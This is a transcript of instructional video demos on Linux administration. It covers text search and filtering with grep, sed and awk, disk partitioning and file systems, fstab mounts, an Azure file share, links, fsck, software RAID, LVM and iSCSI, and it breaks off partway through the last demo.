update db before you run the locate command to make sure you're searching through the most recent file system changes. So what I could do, for example, is say locate MySQL. What entries do we have in the file system for MySQL? It's very fast. And here it's showing us all the items that match our search criteria. You can do that for, let's say, Apache 2. Where's everything related to Apache 2? Of course, we can also use it to search for data files, maybe ignoring case, so -I to ignore case. Let's say I want to look for budget asterisk. So it's showing me in my current location that I've got a file that matches my criteria. The file is called budget1.txt. The interesting thing, too, is you can also add other parameters like -c. What this will do is count the occurrences of the results found by the locate command, in this case, 1. In this demonstration, we're going to be working with pattern matching to try to find things that might be otherwise more difficult to find or to manipulate within text files. Specifically, we'll be looking at 3 commands. So we'll just be scratching the surface by looking at the grep command. We'll look at sed, S-E-D, and awk, A-W-K. So the focus here is searching for and filtering out data, that type of thing. The first thing we should do is take a look at what we've got for a couple of sample files that we will be referring to. I'm going to cat a file I have here in my home directory called cities.txt. Within it, I've got 2 column headings. One is city code, and I've got a bunch of city codes under that. And the next is city name. And of course, I have a bunch of city names there. I have another file here too. If I cat customers.txt, it's just a sample file. It's got a city column header with a couple of cities listed under it, and it's got a customer column with last name, comma, first name for a few sample customers. Okay, well, let's get to work then. We're going to start with the grep line filtering tool. If I man grep, it comes back under the description, and it says that it's searched for patterns in each file. And of course, as we go through the help or the man page, we've got all the command line parameters that we might want to use to change the behavior of the grep command. Okay, let's do an example. We'll do a basic one. I'm going to run cat cities.txt, which we know returns the contents of that file in its entirety. But what I can do, if I bring that command back up, is I can pipe it with my vertical bar symbol that pipes results of the command on the left to whatever's on the right. And what I can do here is pipe that to grep. And I can say I want to do a case insensitive, so ignore case -lowercase I, for the word London in lowercase letters. And notice it found London with the CD code of A09 with an uppercase L. If I didn't have -I to ignore case, we would get no results. So that can always be very important when you're using the grep line filtering command. However, another way to use grep is not just to pipe commands to it, but it as the leftmost command, the main command. I can just type grep, let's say -I to ignore case, London, and I can use the input redirection symbol, which is a less than sign, and tell it bring in the contents of something called cities.txt, our little text file. That too will also work and yield the result that we had previously. So there are a few ways to do the same thing. And that's important to understand if you're looking at help files or if you're on the internet searching through forums on how to accomplish something at the command line, or if you're looking at shell scripts, whatever the case is, there's more than one way to do things. We could also do the following. We could run grep-case insensitive. Let's stick with the same example, London, but then I could just put in an asterisk. Well, what does that mean? Well, it means all of the files in the current directory. So notice it found a couple of occurrences of the word London in different files, one in cities.txt and two occurrences in customers.txt. Of course, notice that what grep is doing is returning the entire line within that file. Now, there's more you can do with grep, but the purpose here is to get a general familiarity with searching and filtering, in this case, the file system. Let's move on and take a look at the sed command, sed. If I man the sed command, it talks about it being a stream editor to do basic text transformations, maybe to delete text that you're searching for within a file, or maybe to substitute or replace it. There are so many things you can do with this. And again, we have all the command line parameters available here. So I'll press Q to get out of here, and let's just do a few basic examples. So I'm going to run sed, S-E-D, and in single quotes, I'm going to put in S/London/Liverpool/ and then single quote, and then customers.txt. What does this mean? What are we trying to do here? Well, what we're trying to do here with sed is we're trying to substitute. That's where the lowercase s in the expression comes from. We want to substitute London when we find occurrences of it in the customers.txt file, and we want to replace it with or substitute it with Liverpool. Now, that's only going to be in the command line output. We aren't writing the change to the file. Let's see how that works. Enter. Okay, so I've got two occurrences of Liverpool now shown in this output, one for Cody Blackwell, the second for Maxwell Bishop. If we just cat that source file, customers.txt, notice that London is still in that customers.txt file. So all we've done is manipulated the output on the screen. Now, of course, you can capture that to a file. If I use the up arrow key to go back to our sed command, maybe what we'll do is use an output redirection symbol, a greater than sign. Let's call this new underscore customers.txt, enter. So we get no output on the screen, of course, but if I cat the new underscore customers.txt file, we've now got Liverpool that has replaced the value of London under the city column for those two customers. Now, there's so much more that you can do with that, but let's move on and take a look at our final tool here for filtering data, and that's going to be awk, A-W-K. Let's type man, A-W-K. Let's look at the man page for awk. So it talks in the description about how it's based on the awk programming language. It gets very powerful. You can do some very complex things with the awk command. We're only going to scratch the surface and do some very basic things for filtering. But again, down under options, we've got a lot of command line parameters that can be specified to control the behavior of the awk command. However, I'll type Q, let's clear the screen, and let's do a few examples. Awk, A-W-K, and then space. And within single quotes, I'm going to start with an open curly bracket, and I'm going to put in the word print, meaning I want to print back or display something on the screen, $2, comma, $3. So columns 2 and columns 3. Close the curly brace, close the single quote, but we need a source for that. Where's the data come from that we want to print? It's going to be coming from, let's say, customers.txt. Notice what it's done is return columns 2 and 3, which would include the last name and then the first name. Now, we can also, and sometimes this will be handy when you have large output, just lay line numbers next to each entry. So I'm going to run AWK space, single quote, within an opening curly brace. I'll then type print NR, my line numbering, comma, $0, close my curly brace, close my single quote, and again, customers.txt. Now, the $0 simply means we don't return column 1, 2, or 3. We want everything. So it returned everything along with line numbers shown in the leftmost column. Let's say we were to cat/etc/password, PASSWD. That's the user account file on this local Linux host. And of course, notice the delimiter between each chunk of information is a full colon. All right, so let's work with this a little bit. What I'm going to do is run awk --F colon, meaning my field delimiter is a colon, then single quote, open curly brace, print, let's say the first column, $1, close curly brace, single quote. Now I want to run this again /etc/password. Notice all it's doing is returning what's in column 1. We told it that the delimiter in this particular case was a colon, so it's very easy for it to determine what information we want to pull out of that entry. So that will give you a general idea of some filtering commands and some of the basic things that you can do with them, but of course, they can get much, much more complex if needed. This demo is all about creating Linux file systems. Now, while we will be focusing on doing that at the command line, it's also important to note how you might do that if you have a desktop GUI on your Linux machine. Here I've got Ubuntu Linux Desktop. Now, one of the things that I could do here is click my little Show Applications button in the left-hand bar, and I could search for the word disk, and I could choose the Disks tool. Here, for example, I would be able to get a list of my disks, and when I select it on the left, I get a sense of how it's laid out over here on the right. And if I had additional disks, they would show up over on the left. Of course, you can also select a given partition, and if I click the configure or the gear icon, I can format the partition, I can edit the details related to the partition and the file system, I could resize it, I could run a check on it, and if there's any corruption detected, I can run a repair. I can configure mounting options for that file system. So depending on the desktop GUI environment you have, will determine exactly what the tool will look like. And there are plenty out there, but that gives us an idea of that. Let's switch over to the command line on a different host. In Linux, we can always rely on the fdisk command. I'm going to run sudo fdisk-l for list. In the output, it is breaking down the configuration on this machine for the disk subsystem. So if I scroll back up in the output, I'm interested primarily when we get to the SDA section. The first disk, in this case, it's about 80 gigabytes, and we have a display on how that disk has been carved up into 3 partitions, SDA1, SDA2, and SDA3. We have the type of the file system, whether it's for booting or just a Linux file system. Then we have device SDB shown here, which is about 20 gigabytes, but there are no partitions. And the same goes for device SDC and also SDD. So I'm going to run sudo fdisk/dev/sdb, and I'll press enter. Now it tells me here that this disk is currently in use. And specifically, I get the sense here that it's being used by Logical Volume Management LVM. However, I have the option of wiping the disk. Now I know I don't need anything on this disk, so I'm going to press N for new. And for the partition type, I'll type in P for primary. Now it asks, do you want this to be partition 1, 2, 3, or 4? So classic master boot record or MBR type of options. I'm going to leave the default of 1 by pressing enter. And I'll press enter to accept the default starting sector and ending sector. So I've now got a Linux partition, which is 20 gigabytes in size. Now I have a message down below. It says partition number 1 contains an ext4 signature. That means that it's in use by a file system. Now, you won't get that if it's a brand new empty disk. However, this had something on it before. So it asks, do you want to remove the signature? I'll type in the letter Y for yes and press enter. It says the signature will be removed by a write command. So I'll type in W to write my partition changes back to device SDB. If I run sudo fdisk-l for list of /dev/sdb, notice we've now got our 20 gigabyte Linux partition SDB1. Now, once you've got a partition, the next order of business, of course, is to make a file system on it so you can actually use it. I'm going to run sudo makefs, make file system, -t for type. It's going to be ext4 /dev/sdb. Now, not just SDB, but SDB1. I specify the partition. Okay, so it looks like our ext4 file system has been created on SDB1. What I want to do is I want to make sure I can mount that. So I'm going to run sudo make dir. Maybe on the root I'll make a folder called data1. And I'm going to run sudo mount /dev/sdb1, and I want that available under /data1. So if I run sudo mount and grep it for sdb1, it's showing here that we currently have a mounted file system, sdb1, which is available under /data1. That's kind of like a drive letter in Windows that points to a file system. So you can work with files and directories under data1, and what you're really doing is making changes to the underlying partition 1 on device SDB. In this demo, we're going to be working with mounting local Linux file systems. Local in this context means from local storage. In other words, not network-attached storage, not storage that we're accessing through a storage area network. Now to get started here, it's important, of course, to run sudo fdisk-l to list how the disks are carved up. For example, device SDA has 3 partitions. One is a boot partition. It's pretty small, about 1 megabyte. We've got a 2 gig Linux file system. And then in the third partition, SDA3, we've got a 78 gig Linux file system again. Device SDB is carved up into 1 partition, which uses pretty much the whole disk. It's just a Linux type of partition. Then we've got device SDC with nothing on it, and SDD again with nothing on it. Now, if I type mount, and let's say, for example, we pipe that to the grep line filter, I'm interested in device SDB. It appears that we've got partition 1 on device SDB that's been mounted under /data1. So if I do an ls of the /data1 directory, all we see is lost and found. So really, there's nothing there. But it is mounted in read-write mode. So RW is here. Okay, well, let's build a new partition and mount it. And then we're going to make sure that these mounts are persistent between reboots. Because by default, when you use the mount command to mount something, it'll mount it in the current system session, but that's not remembered unless you put it in the appropriate file, which gets read on startup. So we'll take a look at that after. First things first, sudo fdisk/dev. I want to work on SDC. I want to press N for a new partition. The default is P for primary partition. I'll press Enter to accept the default partition number of 1, and I'll also press Enter to accept the default starting and ending sector for the partition. At this point, I need to press W to write that to disk. So if I clear the screen and run sudo fdisk-l for list/dev SDC, notice, of course, we've now got our SDC partition 1, which is about 20 gigabytes in size, just a standard Linux type of partition. From here, I could run sudo makefs, mkfs, make a file system, let's say -t is ext4, and that would be on /dev/sdc1, and it's done. So next I would make a directory, let's say on the root called data2, and I could run sudo mount /dev/sdc1 on /data2. And if I run sudo mount and pipe that to grep, let's look for SDC, it's currently mounted. So we can now work with the /data2 subdirectory, create folders, create files, and it's all being written to partition 1 on device SDC. The thing is, if we restart the system, SDC1 will no longer be mounted to /data2. We stated earlier that you had to write that to the appropriate config file that gets read upon startup. Well, that file, and I'll just open it using nano, is under /etc, and it's called fs tab, file system tab. It's tab separated. In here, we've got a couple of entries to mount what we already have, but the first thing I would do here is specify what I want mounted. That would be /dev/ in this case, let's say SDC1. Now, that of course corresponds to column 1 up above here. That's shown as being the file system. Now you need a space or a tab to separate that from the mount point it should be mounted into. So if I press tab, I can tell it I want that to go under /data2. What type of file system is it? Well, that's ext4 in our case. Then I can specify options such as read-write. I want it to be readable and writable. Of course, people still have to be granted permissions to the file system to be able to do those things. I can determine if I want it to be picked up by the Linux dump utility. For backup purposes, I'll put a 0 for no. And I can determine the order I want this checked when the system boots up if there's problems with the file system. I'll put in number 2, so after the other existing entries. Okay, so I'm going to press Control X, save modified buffer. Type in Y for yes. It wants to write it to the FS tab file. Perfect. Enter. Now I'm going to run sudo init 6. That's just another way to say reboot. Of course, you'd only do this if you knew the system wasn't in use and didn't need to be left up and running. But I want to do this because I want to test to see if the FS tab file is read correctly and the SDC1 file system is mounted under /data2. Here we go. Okay, the Linux system has rebooted. Now, if I do an ls of /data2, that doesn't tell me anything. Unless we knew there were files in there already, they would only appear when the file system is mounted. If I type sudo mount and pipe that to grep and just look for SDC, indeed, SDC1 is mounted in /data2. So if I were, let's say, to run sudo nano /data2 new file1.txt, this is sample data, and then we'll just write that file out to disk. So if we do an ls of /data2, of course, new file 1 shows up. Now, if we were to run sudo umount to unmount /data2, we'll just use our up arrow key here. If we run the mount command and take a look for SDC, it no longer shows as being mounted. Well, that's because we unmounted it. And if we do an ls of /data2, of course, we see nothing. New file 1.txt is not there because it's not mounted. So, of course, if we run sudo mount /dev/SDC1, partition 1, on device SDC, and we mount that under /data2, now if we do an ls of that mount point directory, new file 1.txt shows up once again. All right, in this demonstration, we're going to talk about how to mount a remote cloud-based file system. What does this mean? Well, that could mean a lot of things, but what we're going to be doing in this particular example is we're going to be creating a shared folder within the Microsoft Azure cloud. More specifically, we're going to create it within a storage account. We can then map to it from Linux. Now, when I say map, I mean we just make a mount point connection to a local directory on a Linux host that points to this cloud-based shared folder. So the first thing I'm going to do here in Microsoft Azure, I'm signed into the GUI portal tool already, is I'm going to click Create a Resource. I want to create a new storage account where I will create this shared folder. Now, I could create it within an existing storage account. It doesn't have to be a new one, but that's how I'm choosing to do it here. So I'll click Storage Account, and I'll click Create. I'll have to specify some details, like a resource group where I want to create the storage account. Like the name implies, a resource group is simply used to organize your cloud resources like virtual machines, storage accounts, virtual networks, and the like. What should we call this? We're going to call it Store Account East YHZ765. So it needs to be a unique name. It'll be in the East US region. Ideally, that is where anyone that needs to make a connection to the shared folder in the storage account will reside. Otherwise, we could change it. And I'm not going to change anything else here, so I'll just click the Review button, and then I'll click the Create button. So the creation is in progress. After a moment, it says your deployment is complete, and we could either click the Go to Resource button to open the storage account. You could also, of course, do it in other ways. You could navigate in your left-hand menu bar down to Storage Accounts. There it is, Store Account East YHZ765. I'm going to click to open that up. Now, within a Microsoft Azure cloud-based storage account, you can store many things. Under Containers, you can create folders and files and just store regular files or binary large objects, otherwise called blobs. You can work with file shares, which we're going to do. Software developers might be interested in message queues to exchange messages between software components, and you can work with basic key value table storage. I'm going to go to File Shares, and I'm going to click the Add File Share button at the top. Let's call this Projects. I'm not going to change any of the other settings here. I'll just click Create. All right, so now we have a Projects shared folder. If I click to open that up, I could then click Browse on the left, for example, to see if there are any files here. Now from here, I can upload files directly into the root of this share, or I could add a directory. I'm going to add a directory. Let's say current_year. I'll click OK. So there's the folder or directory. If I click on it to open it up, I can make an entire subdirectory hierarchy, or I can just upload content, which I will do here. I'll upload a couple of sample files into our directory. So I'll click the Upload button. Okay, I've specified a few files. I'll just click Upload. And after a moment, we've now got content uploaded into our project's share. Now that's great. The next thing we have to do is somehow connect to it from Linux. Well, that's where this Connect button comes in as being useful, because I can select the Linux tab, the mount point is called Projects, I can choose Show Script. Here, I've got an entire script for making a mount point directory on my Linux host called Projects. It's even using the sudo prefix. Now, the connection type we're making here is going to be an SMB type of connection, the same type of way that a Windows client might make a connection to a shared folder, except we're doing it from Linux. So it's going to be working with an SMB credentials file to allow authentication to this in the cloud. And at the end of the day, what we're really interested in here is the sudo mount command, where the file system type -t is CIFS, and notice the nomenclature. It's going to refer with 2 front slashes to the DNS name assigned to our storage account /projects, which is our shared folder name, space, and that's going to go locally on our Linux host under /mnt/projects. And then it's going to use -o for options and specify our credentials file. Wow. So the script is generated for me, and you can, of course, make changes to it and tweak it. So I'm going to click the copy button in the bottom right to copy that script to the clipboard. Now here in the Azure portal, I'm going to go back home and click Virtual Machines. I've got an Ubuntu Linux virtual machine that's running here in the East US location. So I'm going to be using this virtual machine to connect to that shared folder. And if I go to Overview on the left, I also have the public IP here for this Linux host. I'll copy that as well. And I'm going to open a connection to that public IP address using the PuTTY utility. Okay, so once I've made a connection over SSH into that Linux host, this is where I can run the copied script. So I'm just going to go ahead and paste it in here and press Enter. So if I were to run, let's say, sudo tail against /etcfs tab, notice that we've got an entry here for mounting our shared folder in the Azure cloud. So because it's in the fs tab file, it of course will be read after every reboot. And if I were to do an ls of /mnt/projects, there's current year. If we actually dig a little bit deeper in current year, notice the files that we uploaded into the cloud shared folder in that storage account show up here. In this demonstration, I'll be working with hard and soft links in the file system. Now remember, what these essentially provide is an alternative way to access a file. For example, you might have a file in another location on a server or elsewhere locally in another file system, but you would prefer to access it with a link in your home directory. Now that could be true whether you're using the command line in Linux or whether you're using a desktop GUI. So we're going to go ahead and work with both hard and soft or symbolic links. Now first things first, let's get started with looking at what we have. If I type pwd for print working directory, it'll return that I'm currently in my home directory. If I type ls, notice I have a number of sample files here. For example, I've got a file here called customers.txt. If I cat the customers.txt file, it's just got some sample customer information along with the related cities. Let's start by making a hard link to customers.txt. And for this example, I'll just be making the hard and soft links here in the same home directory where the customers.txt file is for demonstration purposes. Now, we'll explain hard links again in detail once we create the link. Let's first create the link and then we'll examine what's happening. ln is the command we use in Linux to create both hard and soft links. So I'm going to create a link. So ln, the source file is in the current directory, so I don't have to specify the path. It's called customers.txt. And I want to create what we're going to call hard link _ customers.txt. That's it. You specify the source, the target where you want the link to exist. Now in this example, again, it's all in the same subdirectory. Normally that wouldn't be the case, but it'll make it easier for us to talk about it. All right, let's clear the screen and do an ls. Now notice, if we look at customers.txt and the hard link file to it, they just look like text files. There's nothing special about it. If I cat the hard link file, I get the same thing as if I were catting the original customers file. Let's make a change to the customers file. sudo nano customers.txt. Let's change Cody Blackwell City from London to Toronto. So Cody Blackwell is in Toronto. This is in the customers file. So why don't we just cat the customers file again? Sure enough, Cody Blackwell is in Toronto. If we cat the hard link file, notice that it also picks up the change. We have more than one way to access the same core data. Now to explain this properly, let's begin by running ls-li. Now the L means long listing, but the I means we want to view the inodes. If we take a look at the inode, which is a number assigned to this file entry in the file system, customers.txt, notice that the inode in this case is 1835074. Notice for the hard link that we made, it's using the same inode number. Now the inode, if you think about it, is an entry in the file system with metadata about a file, like the owner, the owning group, the permissions, the date and timestamps, and pointers to the actual data blocks on disk. So when you make a hard link, you're using the same inode number, which means the same permission sets and so on. Hard links cannot span disk partitions though, that's important. Okay, let's create a symbolic link or a soft link, otherwise also called a symlink. All we do for that is ln and we add the -s parameter. That makes it a symbolic link. As usual, we specify the source. Let's work with the customers file again. And let's call this soft link underscore customers.txt. If we do, let's say an ls-li, let's say for asterisk customer, so that way we only have customer stuff shown here, well, the customers.txt file shows up again with the same inode number as the hard link to it. But when you create a symbolic link, so here's our soft link file. First of all, the color of the text here in Ubuntu Linux is different. And notice it has what appears to be an arrow symbol pointing to customers.txt. So you're creating a link that points to a file, but it gets its own new assigned inode. Notice the inode numbers are different from the hard link and the original file versus the symbolic link. The symbolic link has a new inode. Now it still points to the exact same data blocks on disk. But what's different is because it has a different inode, it means you can have different permission sets, a different owning user, different owning group, and so on. Let's see if this is true. If I were, let's say, to run sudo nano, the text editor, against our softlink file, why don't we change our user, Maxwell Bishop here, currently in London, to the city of Halifax, and we'll go ahead and save that out. So if we cat the softlink customers file, it's showing that Maxwell Bishop is in Halifax. So I wonder what would happen if we catted the original customers file. It should be the same. Cat customers.txt. Maxwell Bishop is in Halifax. So just because you have a new inode for that file system entry doesn't mean the data is different. You're still pointing to the same data blocks with a symbolic link. The other great thing about symbolic links, remember, is that they can span different file systems. They can span partitions. So the source file might be on one file system and the link might be on a totally different file system. In this demo, we'll be taking a look at a few Linux commands that we can use to manage Linux file systems. When I say managing a Linux file system, I'm not talking about making a file system such as formatting a partition. We've already talked about that. What I'm really focusing on here is checking Linux file systems to make sure that they aren't corrupt, because sometimes a corrupt file system entry can actually prevent a file system from being mounted into a mount point directory. So naturally, that's a big problem. So not only can we run some of these commands to check for corruption in the file system, but in some cases, it can also repair damaged file system information. So let's take a look at some of these commands, starting with the file system check command. Man fsck, that's the file system check command. If we look at the man page, the help page, it talks about here that it can check and repair a Linux file system. And then of course, as we go through the help, it explains it further, along with the exit status returned by file system check. And that can be very important if you're scripting. You want to capture what the result of running a file system check was. But also as we go further down, we have the command line options, -l versus -r and so on. Okay, so it's just a regular man page. So I'll type Q to get out of that. And let's start using file system check. I'm going to run sudo fsck file system check /dev /sdb. So what I'm doing here is pointing only to a device. Watch what happens when we press enter. We get strange error messages about bad magic numbers, the super block in the file system being invalid. Okay, well that's because we're not pointing to a partition. So of course there's no file system there. It's just a disk device. If I were to clear the screen and use the up arrow key to bring up that previous command, and let's say I point to a partition that I know exists on storage device SDB, so SDB1, this time it reports back that our partition is clean. It also reports how many files we have out of how many potential files could be there, as well as blocks. The key here is that there are no error messages resulting from corruption. If I were to run sudo mount, and let's pipe that to grep, and let's look for SDB. Is it mounted at all? Nothing. What if it were mounted? How would that behave? sudo mount /dev/sdb1 under a directory in the root I already have called data1. So if we now check to see if it's mounted, sdb1 indeed is mounted. It's an ext4 file system and all that good stuff. Let's use the up arrow key to go back to our file system check command against dev sdb1. And so when we press enter, we get an error because it says that it's mounted, it cannot continue, aborting. Okay, so the default behavior is that it doesn't want the file system to be mounted. And again, if you're having problems with the file system, if you know you already have issues, you probably can't mount it anyway. Let's cat /etc/fs tab, file system tab. This is a file where you can put in persistent mount points, things that you want mounted at boot every time the system starts. I'm interested in the sixth column or sixth field to the right. Now on the left, of course, we've got the device, then we've got the mount point, the file system, some options like read, write, whether the disk dump utility will look at this file system, that's the 0 in this case, and then you will have either a 0, 1, or 2, and what that means is whether fscheck should perform a quick check on boot up of the file system. 0 means no, but for the root file system, showing up above here, notice that's got a value of 1. That means that the root file system will have fscheck run against it automatically at boot time before any other ones listed with the value of 2. Now we can verify this by doing a man 5 fs tab. Putting the 5 there means that we want help not on a command, but on a configuration file. And as I go further down here, when it talks about the sixth field, it talks about whether fscheck will perform a check at boot time and in what order. So that's a bit about fscheck. I'll press Q to quit out of that. Another command of interest is going to be the tune2fs. For example, sudo tune2fs-l for list/dev/sdb1. What this does is it lists some detailed information about that particular file system. Now, if I scroll back up, we're primarily interested in here in the file system state, which is showing here as being clean. Of course, there are many other interesting attributes being shown here for that file system. If we were to take a quick look at the man page for that man, tune2fs, this is a command that allows you to modify some settings or file system parameters for ext2, ext3, and ext4 file systems. Okay, well, what kind of stuff might we do? Well, you might do something like this. You might say, is there a volume label assigned to the partition SDB1? I could run sudo tune2fs-l/dev/sdb1 like we did before, but I could say, I only want to see the line that has volume on it. And there is no volume name, so we can set one. I can do that with sudo tune2fs-L, let's say we call it HQ data, for headquarters data, /dev/sdb1, enter. Just sdb1, enter. There we go. Let's clear the screen and let's go back to where we were listing the volume label. Notice now the volume label shows. So all that does is helps make it much more readable on a system where you're dealing with a lot of different file systems. Sometimes meaningful names make file systems easier to identify. And finally, the last thing I'll do here is run sudo tune2fs-i1w. This means I want to perform a file system check once a week. Okay, of /dev/sdb1. So if you want to schedule this type of thing without using other commands like file system check and creating cron jobs, you can go ahead and do this using the tune2fs command. In this demo, I'm going to be configuring software RAID within Linux. We know that there are many different levels of RAID and that they can either provide performance benefits or increase availability if we have a failure of some kind at the disk subsystem level. We're going to be configuring disk mirroring. Now, RAID level 1, disk mirroring, requires 2 disks. Anything written to what will appear as 1 disk in the operating system is actually being written to 2 for availability purposes. The first thing I'm going to do here in Linux is run sudo lsblk list block. I'm going to show block storage devices --scuzzy. I am primarily interested in devices SDC and SDD. And what I really want to do is check out how they're partitioned, if at all. So to do that, I'll run sudo fdisk-l for list /dev/sdc and then /dev/sdd, enter. Okay, so device SDC is 20 gigabytes in size, but there are no partitions, and the same thing is true for device SDD. Perfect. What we have to do is create a partition and flag it as being used for software RAID on each of the disks, then we can configure the mirror across those 2 disks. How do we go about this? Well, let's start with the first disk device, one thing at a time. sudo fdisk/dev/sdc. I'll press N to create a new partition. The default is P, a primary partition, which I'm okay with. Enter. I will also press Enter for the default partition number of 1 and the default value for the first and the last sector of that partition. I'm asked if I want to remove an existing signature on the disk. I'll type in Y. It was used by something else previously. But the next thing I need to do is press T. When I press T here within fdisk, it allows me to select the partition type. I can type a capital L to list all of the partition types. But I know what I need to do is type in FD, which will set that to a Linux RAID auto detect type of partition. That's all I need to do for that disk. W to write that to the partition table. Then I'm going to do the same thing, but for the second disk that will be in the array. So sudo fdisk/dev/sdd. This time I'm going to repeat the same steps. N for a new partition. I'll just keep pressing Enter to create partition 1, a primary partition. I'll press T to set the type to FD, which is Linux RAID Auto Detect, and I'll write that out to the partition table by typing W. So now our two disks are set up, at least at the partitioning level. If I use my up arrow key, I can go back to where we were listing how those two devices were carved up, and notice that we've got SDC1, Linux RAID Auto Detect, and also SDD1, same thing, the type is Linux RAID Auto Detect. That's what we want to see. The next thing I'll do is install the software we need to manage mirrored disks. So I'm going to run sudo apt install mdadm, Mirrored Device Administration. And before you know it, it's done, it's installed. So I'll clear the screen. Now I'm going to run sudo mdadm because I want to create a mirrored device. I want to create a disk mirror. So --create /dev, I'm going to call it md1, mirrored device 1, --level equals 1, because remember RAID level 1 is disk mirroring, --raid -devices equals 2, and I will list them here as being /dev/sdc1 space and /dev/sdd1. Enter. Continue creating the array. Yes. Okay, so it says the /dev/md1 array was started. So let's check the progress here. sudo mdadm --detail for /dev, and we know it's called md1. That's how we refer to it. It's currently at 20% complete for synchronizing the two partitions. Now, even though they're empty, this is just what it does initially. So what we would now do is we would make a mount point directory. So let's say sudo make dir /, I'll just call it mirror for the sake of clarity. So of course, now we have to run sudo makefs to make a file system, let's say -t for type of ext4 on /dev/md1. And then, of course, we can run sudo mount to mount /dev md1, our mirror device, into the /mirror folder. And it's done. So we now have access to writing to the disk mirror by accessing the /mirror mount point directory. In this demo, I'm going to be working with Logical Volume Management, or LVM. The general purpose here in Linux is for us to take physical storage space from numerous physical storage devices, lump it together into what's called a volume group, and then from that volume group, we can then choose to create one or more logical volumes. So a logical volume gets mounted to a mount point, and when you're working with a logical volume, you might actually be utilizing storage space from multiple underlying storage devices. So let's get started with this. The first thing I'm going to do here in Linux is run sudo lvm disk scan. I want to see if I have any physical storage devices that are suitable for use with logical volume management. I am interested primarily not in device SDA, but rather in devices SDB, SDC, and SDD. I've got 3 20 gig drives available for this purpose. So I'm going to run sudo pvcreate. This stands for Physical Volume Create. This is how you mark underlying physical storage devices as being usable within an LVM volume group. So /dev/sdb, but also /dev/sdc and /dev/sdd. Okay, so I've marked these devices as physical volumes. Let's clear the screen with clear, and I'm going to run sudo pvs, Physical Volume Summary. Well, it looks like there's one that's already there on SDA that was created by my Ubuntu Linux installer. Notice that the format column shows LVM version 2. However, we are interested in devices SD, B, C, and D, and they're showing up here, each being 20 gig in size. The next step is to go ahead and create a volume group. This I could do with sudo vg create, volume group create. I'm going to call it vol group 1. It will consist of /dev/sdb, /dev/sdc, and /dev/sdd. Now I can make multiple volume groups to split up that space, but in this example I am choosing to use the free space on all of those devices for this single volume group. You don't have to do it that way. Now we can run sudo vgs, volume group summary or show. And so there's vol group 1. Under the number of physical volumes or number of PV column, it says 3. But there's no logical volumes, no LVs, at least not yet. Notice that the volume size is approximately 60 gigabytes in size. So the next thing I do is create a logical volume. Now I can have a single logical volume that will consume the entire 60 gig or approximately 60 gig of space, or I could create multiple smaller logical volumes in vol group 1. In this case, I'm going to create just one logical volume. So sudo lv create logical volume create -capital L. Let's say I want to use the 59.99 gigabytes. Capital G for gigabytes, -n for name. I want to call this logical volume projects, and I want to create it on vol group 1. Enter. Now I get a message saying that vol group 1 has insufficient free space. I'm using too much of it. Okay, well I'm going to bring up that previous command. We're cutting it a little too close here. Let's go ahead and just use 50 gig of that space. I'll press enter. LVMs need a bit of space left free to function correctly. So now we've got our project's volume created. Now the next thing I would do is run sudo mkfs make file system -text4. Let's say is the file system type I want to create. So I'm going to format that volume. But the way I refer to it here is /dev/mapper/vol group 1 -projects. Enter. Okay, it looks like it's creating the file system, allocating group tables and inode tables, creating a journal. Everything's good. So to actually gain access to that file system, I need a standard mount point. So I'm going to run sudo make dir / let's say on the root, we'll create a directory called projects. And then I'll run sudo mount /dev/vol group 1 /projects. Enter. -projects with this nomenclature. Let's try that again. Then I'll run sudo mount /dev/vol group 1 /projects, and then I'll tell it where I want to mount it into. So projects is my logical volume name. I want to mount it into a folder on the root called /projects. If I were now to run sudo mount and pipe that to grep, looking for projects, it is successfully mapped into our mount point directory. Now that mount is only currently while Linux is up and running. It's not persistent. It won't persist between reboots unless we add it. So I'll use the nano text editor, unless we add it to /etc/fs tab. So I'll add /dev/vol group 1 /projects. That's what I want to mount. That's the device. That's the LVM. And then space, I want to mount that in /projects, just like we did in the command line. File system type is ext4, so I'll add that after a space. And we'll just use a lot of the default setting here. So defaults. Defaults would include things like the fact that we want this to be a read-write file system. Of course, depending on permissions, will really determine what users can do. I'll put in a 0. I don't want to use the dump utility for this file system. And my last 0 will simply be used here, which just means don't check the file system using the file system check utility. Okay, Control X to write that out. Save modified buffer. I'll type in Y for yes and press enter, and it's done. So now that mount point will be persistent every time we boot up this server. In this demo, I will be configuring a Linux-based iSCSI initiator. Now, before you can use an iSCSI initiator to connect to network storage, the network storage has to be made available first on the iSCSI target. What we're going to use in this case for this demo is a Windows server as the iSCSI target, and the Linux will be a client that consumes that disk space as an iSCSI initiator. So the first thing we should do here in Windows is make sure we have that support installed for iSCSI. So I'm going to go to my Start menu, I'm going to fire up Server Manager, And then I'll click Add Roles and Features. I'll keep clicking Next to go through all of these settings until I get to the Roles screen, Select Server Roles, where down below I can expand file and storage services. I can expand file and iSCSI services. Some of the components here are turned on, like the file server resource manager, but I want to turn on the iSCSI target server. So I've got that turned on. I'll click Next, and I will keep clicking through this until I get to the install part. Once that's installed, I'll click Close, and on the left, what I want to do is go to File and Storage Services, iSCSI. Now it says to create an iSCSI virtual disk, start the new iSCSI virtual disk wizard. So under Tasks on the right, I'll choose New iSCSI virtual disk. In the list down below, I've got Drive F available with nothing on this machine, so I'm going to select it to host my iSCSI virtual disk files. I'll click Next. I'll call this iSCSI_vdisk1, iSCSI virtual disk 1. Let's use up the 9.91 gig, dynamically expanding as we start putting file content on there. Then I'm asked to add a new iSCSI target. I'll click Next. And I'm going to create a target called Linux hosts. Now, the terminology isn't great here. What this really means is an allow list. Who should be allowed to connect over the network to this server where iSCSI storage will be hosted? So, specify access servers. Click Add to specify the iSCSI initiators. Okay. And down below, I'll enter a value. I'll select IP address. And I'll enter the IP address of the Linux host down at the bottom, and I'll click OK. So it will be allowed to connect. I'll continue by going to Next. I'm not going to enable any authentication on this example, so I'll just click Next and Create, and then Close. Okay, now we've got some iSCSI storage available here in Windows. Now, having that iSCSI virtual disk selected down below under iSCSI targets, I can right-click on it and choose Properties, where I can copy the IQN. This special name is going to be important. We're going to need to connect to it from our Linux host in a minute, so I'm going to go ahead and copy it to my clipboard. The next thing I'll do here back on my Linux host is I will run sudo iSCSI ADM, that's a Linux command, -- mode discovery, -- type send targets, -- portal, and this is the IP address of the Windows host, which is serving as our iSCSI target. I'll press Enter. What it's doing is saying that it's listening for iSCSI on port 3260, that's TCP, and here's the IQN here that we saw over on the Windows side, so it can see it. To attempt to make a connection to it, I will run sudo iSCSI ADM -- mode, and this time I'll specify node. I'll set -- target name to the IQN, which is shown above. I'll then set -- portal once again to the IP address of our Linux host, and then I'll use -- login. I'll press Enter. Okay, it says that the login was successful. Let's clear the screen. Now, if I run the lsblk list block devices command, -- 